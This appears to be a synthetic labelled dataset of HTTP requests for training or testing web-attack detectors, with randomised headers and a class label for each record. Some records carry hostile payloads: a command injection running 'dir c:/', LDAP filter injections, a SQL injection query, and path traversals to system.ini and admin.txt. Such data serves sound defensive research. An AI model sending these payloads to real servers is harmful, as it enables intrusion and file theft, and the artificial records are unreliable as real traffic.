Referer: http://www.teetoiq.biz/Rrbnn4R/dicfui.mdb
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.8 (compatible; MSIE 4.6; Win 9x; eeenyrfnd)
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 860x1351
Via: 5.1 225.118.131.159, EeOi/4.7 252.53.14.181, HTTP/7.4 130.212.95.161
Transfer-Encoding: identity
Upgrade: ptgi/5.0, Tpaeet/6.5
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39985
Start - Id: 44359
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: 185.104.55.196
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, identity;q=0.6, deflate;q=0.8
Accept-Language: y9-9;q=0.3
Cache-Control: no-transform
Client-ip: 85.70.71.191
Cookie: Btizoslto91er=cmdyxli
Cookie2: $Version="4"
Date: Mon, 16 Jan 06 21:53:44 CET
ETag: "Mp0.89pM9u@RmCsjjuH"
Expect: 100-continue
From: ks7mao@6esnaehk.it
If-Modified-Since: Mon, 05 Apr 10 24:42:55 GMT
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: ".dK6XfSKG.FdUc5gEh"
Max-Forwards: 57
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: 915-
Referer: http://www.L2etaw.net/kel9a/9iid/Yee0.pl
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 9.4; rm-oo; rv:7.6.8) Gecko/41284685
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: compress
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44359
Start - Id: 24430
class: Valid
GET /Thoiaodaans/lVT2cIQp7SVu4I.shtml?emmehtt=eEhOS1n7s&eP6XyQ@Kwget=etuseci&Iudv5e5hlq8bs6u=4765421&ta2sroz9dteetcb=nha&lrdehptewnro=1942190 HTTP/1.1
Host: www.eaSiue3n7.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic, windows-1258
Accept-Encoding: identity, deflate, gzip, compress;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 118.147.21.138
Cookie: aicHnhs8lcbOos=e7T;hrpcaomc=otrebgsoundu av0drmxpassthrum
Cookie2: $Version="853"
Date: Sun, 17 Oct 04 10:19:30 CET
ETag: W/"06YAfkFeLx2DrpkXE"
Expect: h6ascOr
From: tetatv@lisp.com
If-Modified-Since: Wed, 08 Apr 09 14:05:55 UTC
If-Unmodified-Since: Fri, 03 Dec 04 13:01:13 UTC
If-Match: "ypjy2h@XXz8LdCWjf_"
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: trHksd ftbdaee=elEtN
Authorization: zsml ebrsl=uoywwb
Range: -78
Referer: http://www.hfceL.st/eorO/7ahEe/eAaeN.fgf
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: iDyByi7kk http://www.etObda.cz
UA-CPU: StrongARM
UA-Disp: 2238,701,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: oyoe1e/6.3 www.anhnt.jpg, 2.9 198.89.191.241
Transfer-Encoding: identity
Upgrade: I3r8es/8.7
Warning: 384 232.82.13.199:64408 "wtsat5ea1fS" "Fri, 28 May 04 19:43:14 CET"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 782387
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24430
Start - Id: 17585
class: Valid
GET /iIfBhu5XEdqzfCCa/siiacceptk0YwWH/tbCpCPOMrj18kxnZw/mOE5fnyEmO/nr7trtsaer6aarse.htm?isbe=soRseeoptetOtnodelt&Fmdoihcnjed=ob&eni1rlirg1=s6%284p%7C&tEcTsftoaiohss=%3Abncdocument&dlrgt=9143580&izzeon19=t5s78x.V&5xHg=l&etrotiefd=ol7mhgnduaxreC4o&ee=l%26Sat5ngroup+by%24%28f%28n%5D&lrcaeetesowh4=bgsounddMeEie HTTP/1.1
Host: 131.113.35.231:031
Connection: ih13wow
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity;q=0.3, deflate, compress;q=0.6
Accept-Language: iaahpA-tDrqmm, shennylt-qi7hlEa;q=0.4, i-fGlt, o-8;q=0.4, sJLTevt-rstwoir;q=0.8
Cache-Control: no-store
Client-ip: 177.96.5.81
Cookie: 22nhreii=4483433;tls=leliG;yanR=nPF;9rds5e=8dp;_TTgCainputDXF=ichTtFG
Cookie2: $Version="1"
Date: Sun, 16 Jan 05 23:30:26 GMT
ETag: "CAjY4qra185GoVI_"
Expect: 100-continue
From: eczairnn@8nwil2emd.be
If-Modified-Since: Tue, 28 Jun 05 12:13:53 CET
If-Unmodified-Since: Tue, 18 Aug 09 19:53:34 CET
If-Match: *
If-None-Match: "3uiulQjBzMYK4OMz_yk"
If-Range: *
Max-Forwards: 879
MIME-Version: 3.2
Pragma: nl=2he6aiak
Proxy-Authorization: NTLM aWltYWZ2cmlpcmljZm1haTJuNjF0OW5zb2VlaWVlbmFkdnNvSG5uRGls
Authorization: 6ntWaw hdbq9ss=xFLmam
Range: 22389-71,-169,-0
Referer: /asc1/au7l/41maan.nsf
TE: chunked
Trailer: Accept-Charset
User-Agent: ysTT7ftme (ebk0yI3; iAgECP; oH9De9rioV; oWFoQN7; 5Izs3anah)
UA-CPU: 68000
UA-Disp: 611,8955,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: Nshedt/8.6 141.179.182.62, FTP/4.4 215.58.245.9:4076, 9.4 www.l4otrree.js
Transfer-Encoding: deflate
Upgrade: dnoui/0.4, uaf/5.9, l2oeee/5.7, loxm8a/0.1
Warning: 649 www.iotlaAf.gif "pmsewe6teC5eehR" "Tue, 11 Dec 07 13:52:39 UTC"
X-Forwarded-For: 108.95.130.193
X-Serial-Number: 2432854713
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17585
Start - Id: 38924
class: LdapInjection
GET /bac3eett7cl/mintedaoxnere7Eht/dvWDkmL0G8NV-mWNI/gKwPiSuW/ebpB.w4h-/ndciYentnssmeeaysef/hsvscoijoshtee/eRjUcr1NXVAHq/wp3ws/VC.nsf?@ytqZ9kmJcN=dHsadrop%2FmcateopenlinkrotS&eagae6eAae=j5-o%7Ce&ZBnullcopyAh=82&wPlrtkupdate3Yn=iePnrii&HsstivtZrsr=34iioirtD%5D&pnrnl6yatzkon=iec%40&hXUs=r4VMuuHc&rnIerqnilZMt=8487097&dh=5606&AK9YYywFm0=mhtc%29%28%26%28objectClass++++%3D+aT*%29&f4aevhptRgerimg=t&ayeoazueehpuant=p7lye9FMV&toaugishrd=ecI6itnl HTTP/1.1
Host: 1.27.19.199
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1255, iso-8859-8-i;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=2613
Client-ip: 200.72.166.1
Cookie: eDvitioop8e=84737;iaa4oeRpo=i1/er;1rEeaElldtwsh=sd3iyXUGG;eosutttE=sesortnemtn8hdsihw;ueaszsilatpEr=ePhaoneEti2boinaid;rseejthEhH=05
Cookie2: $Version="28"
Date: Sun, 16 Jan 05 14:22:43 UTC
ETag: "YohW@GfSH_k7Q_NUvl"
Expect: t21byh
From: Utnn8c@iodssieo.biz
If-Modified-Since: Wed, 24 May 06 11:50:44 GMT
If-Unmodified-Since: Sun, 12 Jul 09 14:21:09 GMT
If-Match: *
If-None-Match: "J-FCzTREdqFI1ip"
If-Range: Thu, 29 Apr 04 16:11:55 GMT
Max-Forwards: 288
MIME-Version: 7.2
Pragma: I='hq22a3a'
Proxy-Authorization: mtSl wopwaseh=raeaa
Authorization: Basic YWxvMGY6dGloaXQyZQ==
Range: 49-,0149-664723,864-
Referer: http://www.Cybxl.gov/8sLgttc/aZtEe/mbo3esd/pwfu2si.ace
TE: gzip;q=0.2,chunked
Trailer: Pragma
User-Agent: h4eyoaav5/1.0.4.2.4
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: FTP/2.6 www.elUihiei.png, HTTP/8.6 113.21.215.92, 8.3 121.63.118.97
Transfer-Encoding: identity
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38924
Start - Id: 14574
class: Valid
GET /3AByzVJY-6cYTeMgd/hyc.shtml?rd=%26ip&a1uoesUeetbu=cHRf7pZ&alareshto4Ir=b0%24s%3Bi HTTP/1.0
Host: www.dsoejesits.org
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-ce, iso-8859-3;q=0.9, x-mac-icelandic, windows-1254, iso-8859-4
Accept-Encoding: *
Accept-Language: brSStB-ezwbvhs, qa-zf;q=0.1, 1p-nawaz, cbeerr-e2e;q=0.2
Cache-Control: min-fresh=004
Client-ip: 22.174.172.88
Cookie: btserb=ncta0ekc ecan;Tap2;daaatCl=qsthVt;aan7mfwdeqtle=494410789;jah=sMnSnnzmjxx;ym0ditc=6807246040;bpua=\eksz
Cookie2: $Version="467"
Date: Sat, 23 Apr 05 12:17:54 GMT
ETag: ".O1a69NE@-RxPCb5"
Expect: ieSoy
From: loafnIt@stnehe3le.uk
If-Modified-Since: Fri, 29 Dec 06 20:02:46 UTC
If-Unmodified-Since: Mon, 20 Mar 06 05:30:18 CET
If-Match: "Q_.fRynU3o3k1Kok8iw3"
If-None-Match: *
If-Range: Sun, 23 May 04 06:34:22 CET
Max-Forwards: 314
MIME-Version: 2.0
Pragma: Y=nrbaE
Proxy-Authorization: NTLM aW41bGllYWh0aG1tdGVyd2F0U3RucGJhaWg0ZGhybmZ0ZWVFb2hsbFA=
Authorization: Basic a2VzYXBrOnJpaG5vdDVv
Range: 958692-53,2925-6276
Referer: /8tgxig.nsf
TE: trailers,chunked;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/9.5 (compatible; smosgro; WinNT; e8ADeh; nnrrym)
UA-CPU: 68000
UA-Disp: 962,7885,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 658x567
Via: 5.8 www.1lnae8rH.tiff
Transfer-Encoding: deflate
Upgrade: s0sUoi/6.0
Warning: 663 www.eNonNsgt.tiff "zwetin" "Wed, 09 Feb 05 17:14:54 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 703782437729534
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14574
Start - Id: 38797
class: LdapInjection
GET /oJtWi.htm?eelaeldfz=slaet&ix06mt4=iv&eEe=nPIMBftW6&1sSa=167122&mrewZioSaLh=%29++%28+%7C+++%28++cn%3D*o++++%27brien*++++%29%28mail+%3D*o++++%27brien*%29+&teg=tgoieItronao&vRrY=eK5nvqAz5&ethilmescEtcse=729020&boot.iniuqgIX=1915&RnNojj=nrisiacftieeud&SpeaLiengh8aeh=iqo2h8 HTTP/1.1
Host: 232.47.3.128
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-9;q=0.6, x-mac-japanese
Accept-Encoding: *
Accept-Language: L-uDmlst;q=0.2, yapigIes-eC, s-lhf;q=0.0, y-vremnikt;q=0.1
Cache-Control: max-age=23762
Client-ip: 239.52.8.232
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Sun, 26 Jun 05 21:23:50 GMT
ETag: W/"RooiUzARMje8u.cqCJgI"
Expect: 100-continue
From: Nrt0ttsL@rnpbsgro.fr
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Sat, 28 Jul 07 06:14:27 UTC
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: "96hepxWdtqgSOw8Agg"
If-Range: Sun, 30 Oct 05 07:15:52 UTC
Max-Forwards: 7006
MIME-Version: 3.1
Pragma: hlne=hai
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic b29UcnQ6cG1jdA==
Range: 89831-,-364983
Referer: http://EoP0ieo.cz/xnm8h.mp3
TE: gzip;q=0.5,gzip;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/9.5 (compatible; oeid1riesw; Open BSD i386; ilhq; sAejahnot)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/7.8 135.21.229.221, 4.9 www.ulRe.shtml, cm3/9.7 94.206.137.126
Transfer-Encoding: gzip
Upgrade: oorig/6.0, osraet/4.0
Warning: 322 www.iehxp.jpg "lshodeasakay0kd" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38797
Start - Id: 4549
class: Valid
POST /3cKh3twtF4EMS/OWobjectNsystem-/nKo5BxYHBFS/v.passwdeW2div/ld9mTww/eoeeaesa/naIdtbo9ezRtpinEutla/ecd/catBOi.sh? HTTP/1.0
Content-Length: 172
Content-Language: hmpah,mret
Content-Encoding: gzip
Content-Location: http://orzyese.gov/twgrpd.gif
Content-MD5: MTNvYTJudGhpaWN0YXVteg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Sep 04 19:10:18 CET
Last-Modified: Mon, 01 Aug 05 15:41:47 GMT
Host: 115.237.35.160
Connection: etra
Accept: video/*;q=0.4, image/*, video/quicktime
Accept-Charset: utf-8, x-mac-greek;q=0.5, iso-2022-kr;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 131.137.11.104
Cookie: anartn7=@
Cookie2: $Version="2"
Date: Sun, 02 Apr 06 06:56:05 CET
ETag: W/"qeHGrc95g0GImT00kGEh"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Mon, 16 Jun 08 22:30:42 GMT
If-Unmodified-Since: Fri, 13 Jan 06 08:44:14 CET
If-Match: *
If-None-Match: "XrUWnQ4lAV5M6vc@R5D"
If-Range: *
Max-Forwards: 27
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: siAwto Meexad=tnbnonc
Authorization: Digest nc=CA1e9F6D
Range: -574,-888
Referer: /vaxowtaI/onetayf/hm8a.htm
TE: trailers
Trailer: Host
User-Agent: uamsrrohprhib
UA-CPU: x86
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3467x636
Via: 4.3 78.171.212.142, HTTP/2.7 www.olHtn.html:75
Transfer-Encoding: gzip
Upgrade: 5oSf/8.1, asfrl/0.4, ageuy/4.8
Warning: 831 23.54.115.116 "diole" 
X-Forwarded-For: 165.72.96.126
X-Serial-Number: 60314
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5o5oe8wpdeeT4=72791&mochaGAhtpass1By=v&qqJYaXbq=ezTalAh&XMDZ=DtseiC1itesE&hCr=ttuet&yzrnhabLheAfjee=ashutdownpositionnne&na=6809&eo2sb=E8Os&aqet3sw=rinput&jleo=ndi Ocloha4n

End - Id: 4549
Start - Id: 41759
class: SqlInjection
GET /oAgSdos8/GDXiJ/aSwpgtOFiH_zI/shaAnemnl.exe?asth=einoo&hn=xsb&mkaho5sar=Mvbscript&eges=tykAqlgyjKZ&8aoi5oehosecli=%27select+customer_phone+%27%7C%7C%27from+++++customers+%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27+and+++++customer_type%3D1%27%3B&raIthstwoyt7m=Crsrbuglaroex0sosn&hpoae=iZ2X7s3 HTTP/1.1
Host: www.eaeefhd52p.fr
Connection: d8ahftl
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 122.67.58.101
Cookie: Uithl=obeyw;bi=6309;rh=oyar;d6S=Qa-xiaiic;8JOfY38TqB=irhedan7tersreheSe
Cookie2: $Version="99"
Date: Sun, 08 Jun 08 13:02:25 CET
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Tue, 17 Mar 09 11:22:27 CET
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "gDP@ZAnsleJxq6xth8"
If-None-Match: *
If-Range: *
Max-Forwards: 421
MIME-Version: 3.9
Pragma: n='rsnbi'
Proxy-Authorization: Basic c0F0b3k6ZW4wbm9vdG0=
Authorization: Basic ZWFxYXRzczpibnJ6bGVvbw==
Range: 4234-490888,-164882
Referer: http://www.scCQu.be/nniW97d5/fotpde/1laplSaA/iedFe.css
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: caf9TqiJjl http://www.qnliq.st
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9206x518
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: deflate
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 163 www.nra9ood.tiff "0tlethihaeg4hbi" 
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41759
Start - Id: 16513
class: Valid
GET /enLwsmlKS6hSmgV/vbscriptNYbgsound6/neoerf2steTss/p0fi-@b5i/TpSNMf8TC/c@bhy@Li4d3ryXyMrLN/41ooevecedllaaOebpsg/abPVBpt5if/nX/ae3m/oaeaihEtheoJrTd.cfm?shutdownlinkobjectT5zHW7img=839559&mieCEte=5Imio3Igroup+bydA&oehs=7&ds0mdt7nifoihir=072 HTTP/1.1
Host: www.Waoe.org:4
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.4, gzip, gzip
Accept-Language: tai-yetneyt, t7-aec3rsri;q=0.9
Cache-Control: yosdr=niNz
Client-ip: 74.241.75.79
Cookie: l4k4zoh=80@sv1EF;Twa5oN=efa;decdt90=9
Cookie2: $Version="547"
Date: Wed, 17 Aug 05 13:22:30 CET
ETag: "Xun9jE_1fsF7tswH4F0X"
Expect: odss=htsSa
From: a3hb@rjzaoeAala.com
If-Modified-Since: Sat, 03 Nov 07 15:10:00 GMT
If-Unmodified-Since: Tue, 19 Dec 06 21:34:11 GMT
If-Match: "FKEEskgEuZKEn-zzFr@"
If-None-Match: "mTjMuq--DsW93P0MC5Bj"
If-Range: Sat, 03 Apr 04 10:04:55 GMT
Max-Forwards: 4398
MIME-Version: 0.2
Pragma: nswhA4l='t4a'
Proxy-Authorization: OeomE lOouinza=iyto
Authorization: Digest opaque="nti8"
Range: 750-,50435-
Referer: http://www.o9rsay.be/iAePc/xgin/OteHjRev/pkysRa.exe
TE: trailers,chunked
Trailer: Trailer
User-Agent: lehj (eFCB@9WTKE; e9GeAr)
UA-CPU: Sparc
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 950x803
Via: HTTP/6.1 www.saTxbraE.htm, 0.4 23.148.89.251, 3.0 www.moTis.tiff
Transfer-Encoding: identity
Upgrade: doc/7.0, ari/9.3, s1yrm/6.9
Warning: 376 www.ycezutrm.jpg "nens" "Mon, 03 Mar 08 23:13:28 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 9917949
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16513
Start - Id: 36041
class: PathTransversal
GET /adET0tmueednodsr/ee63eesdsmtrgh/NgSOGdkjz-ry3vo/Tprgv5/lsSaneqhpecndr1/bN/dkRsbvIKT@OMpqI/geeede7anckt6AeL.asp?aa96hc=3&oefEtnatsj2sves=%5CWINDOWS%5Csystem.ini&0Inoaewleeqp=sdivsoavRrneeoti&sE8nAszdEe=st0aUoM&s7snSthxrh0Q7l=%3Cyg8netcatnEwh%3AAZsa&eieo=14280972&u7weuRaa77s=Se0cegh&nolood=755072&rth=386429066&F0X5exec=mB3Y&PG9K=f8ert&lmsPr3Zrtllhp=o HTTP/1.1
Host: www.meaml.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-5;q=0.6, x-mac-japanese;q=0.6, iso-8859-7;q=0.3, utf-7
Accept-Encoding: deflate, gzip, compress;q=0.4, deflate;q=0.1, compress;q=0.1
Accept-Language: ast-Yaeho;q=0.9
Cache-Control: max-stale=691
Client-ip: 87.93.92.255
Cookie: rwnvrnSscanrr2s=otfieohti;TYJ=eaeiifat$N;min=6BnctHx8W
Cookie2: $Version="0"
Date: Tue, 01 Jul 08 17:05:21 UTC
ETag: "n-8upU_gq4.C0q_yXO"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Sun, 09 Oct 05 06:14:06 CET
If-Unmodified-Since: Sat, 03 Dec 05 08:15:20 CET
If-Match: *
If-None-Match: *
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 7
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM cmljbm90c3Ntd2Vtc2lpdGRjYXNlaHRvNG1tb2h0QXNzZXNyaG9zdHJkZHQ=
Range: 709-485
Referer: http://onCbit.biz/jnceob/sndgiey/ewridcs/ywoEoac/ocdbhfmy.js
TE: trailers
Trailer: If-Match
User-Agent: qnq9mhtro/6.8
UA-CPU: PowerPC
UA-Disp: 1024,515,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: FTP/4.0 185.69.198.91
Transfer-Encoding: nmmute; ihiem6cs=aes3ofsm
Upgrade: tztr/1.1, esid/8.4, 6ktsdr/4.4, Ipqst/0.4
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36041
Start - Id: 45014
class: PathTransversal
GET /UVh21Lrgj1/77h@8DaJzyASAi/9aRsniimaaoefr/6qEf@/bYP4LzG3jzJv/7jbioA/ztwfGoAeZC7e5PP/tj/eU8Cb-UvElHzxdEWcn/evLeoFexZ/oRRd.css?is2=i&t3e32u@5F=so6ntme1fn&id85n6st9=%2BE&nadeee=e-mtgv&PHRJBE9BzL=yBN252gLlV&o9ntwiiuxenlhcs=27995&zeGbN=8&7xsoGp3d=t&inYse7st=..%2F..%2F..%2Fstalro%2Fadmin.txt&om0fiim7ef=3&igabqo=hhnI_W.D&gitUmmEmn=6188250 HTTP/1.1
Host: www.qIaas2m.org:9
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.1, compress, deflate;q=0.7, gzip
Accept-Language: daa-h, Mii6ayuj-uwk;q=0.1
Cache-Control: no-cache
Cookie: ufpr=haae4sc7tni;7kcrdii=oti 3mao2;e8ngm7uieljese3=389;dhaO9eeceh3Btn=84246;vsycsfseD=tmp
Date: Fri, 19 Mar 10 21:28:39 GMT
Expect: 100-continue
If-Modified-Since: Mon, 09 Apr 07 12:39:21 GMT
If-Unmodified-Since: Sat, 21 Oct 06 08:51:17 CET
If-Match: "AXSuf0CQFTog6V2gZY7"
If-None-Match: "9Unve..FcdXYuOCOZ"
If-Range: "2Io4Kq1XYMrMdbz"
Max-Forwards: 58
Pragma: no-cache
Referer: /suhd/akgkt.cgi
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 2.8; Hh-ee; rv:8.5.3) Gecko/43545896
UA-Disp: 8043,576,8
Via: FTP/9.9 www.nKcW.css, 7.1 www.ectn.html
X-Serial-Number: 65063841

null

End - Id: 45014
Start - Id: 26541
class: Valid
GET /1sehEi6iatst.tiff?zrawncss=sm&cdE=tha&formGousrD3-9=ae%25oq%24Iteu+oetg4vbscript&ek9BRcatA6SZ=+&opNA=rlsOsrxohat&nmsTdteeohncn=rit1yu&dSdTkl=%5Be+%2Bk&ftg7teeWduc1e=54%7CaP&haatoEi7eaouvrs=68103&iaa=replaceet1Ahts%29n%3BsUr%40%5Bsg&NXNMNEboHiT=as86&_kX8A2h=Rom&YiFKs5I=etsmwgjrus&wJs6U6d.ibTu=hceh HTTP/1.1
Host: www.pye33.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 9.2.33.29
Cookie: WLtb=1;FhobjectunioneI2e8=dsyTseeuaunosp;formyxp_WShSF=04126;Ihuy8itrzvcit=o@htpass=o;eeh1
Cookie2: $Version="58"
Date: Sun, 19 Apr 09 18:08:05 UTC
ETag: "fsHNvTI-lRYiDP0Sf."
Expect: 100-continue
From: 2oida@icenhE.de
If-Modified-Since: Tue, 27 Jan 09 01:16:31 CET
If-Unmodified-Since: Sat, 12 Nov 05 11:22:08 GMT
If-Match: "I00j74vLKqj@pN2.wqSy"
If-None-Match: "X7d.sor4VQ2YeeOs.r"
If-Range: Fri, 14 Jul 06 22:51:52 GMT
Max-Forwards: 31
MIME-Version: 5.3
Pragma: eIep=sglbdr
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: -576
Referer: http://www.dtez.st/tloy/Een1.mdb
TE: gzip;q=0.9,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/6.6 (compatible; MSIE 1.0; SunOS sun4u; erywix6f)
UA-CPU: MIPS
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 987x6257
Via: 7.4 156.188.108.34, 5.1 www.r4odexa.js, 1.2 www.tfttxea.gif
Transfer-Encoding: identity
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 248 51.93.56.9 "9mucan7xiiw9go4ettes" "Sat, 18 Mar 06 14:43:39 CET"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26541
Start - Id: 21106
class: Valid
GET /ne6ocimrriobrs/93jjBWao/A8qAeZqftpm9shutdownf/wfpmO0BWg-Lv2bT.sh?pah2iobHuEncec=uyIy3e&DThBbsunionhttpkl5=a.uoXr_&phpWoS3NxWCYI-=8893495&lswtdco=u5w&atdiaDRoDnesf=e%26stdin%7E&aeayo=meta&vadirtnde6ho=niueteeetuN9d&6ozitevJiisw=56000766&sesbtgu=mdoOezs&en37Skitdd=805&wijrCsn=2&08x6e=yGrf&3saeiromost=rpsmrssyeoit&dciet1efgetp6ou=6942478&6ltush=npasswdro%3Bbetweentoxp_-jform-aN8er HTTP/1.1
Host: 125.96.110.61
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.2, iso-8859-8-i, iso-8859-7, iso-8859-4
Accept-Encoding: *;q=0.0
Accept-Language: Inz-eew;q=0.7, sh-5ufsEu, 2drbt-nrestp;q=0.8
Cache-Control: no-store
Client-ip: 42.92.167.68
Cookie: ou3gt=Ilogyaselect
Cookie2: $Version="9"
Date: Fri, 09 Apr 10 19:27:30 UTC
ETag: "bEGyFS.RFNQ4ovS471"
Expect: 100-continue
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Tue, 09 Mar 04 11:20:19 GMT
If-Match: *
If-None-Match: *
If-Range: "Xc.1itWQWod3sKwbRroL"
Max-Forwards: 885
MIME-Version: 9.2
Pragma: a=d
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: Basic T2UxczpIT2tlMw==
Range: 5-42623,-8621
Referer: /xf9ter/anhs/lnona8q.cgi
TE: gzip;q=0.5,chunked,chunked
Trailer: Via
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 0.2; ne-d2; rv:2.7.9) Gecko/31024108
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: 2.9 www.hed8kn.jpg:37, 3.2 www.3hxotdKC.tiff, FTP/3.6 www.neyn.html
Transfer-Encoding: identity
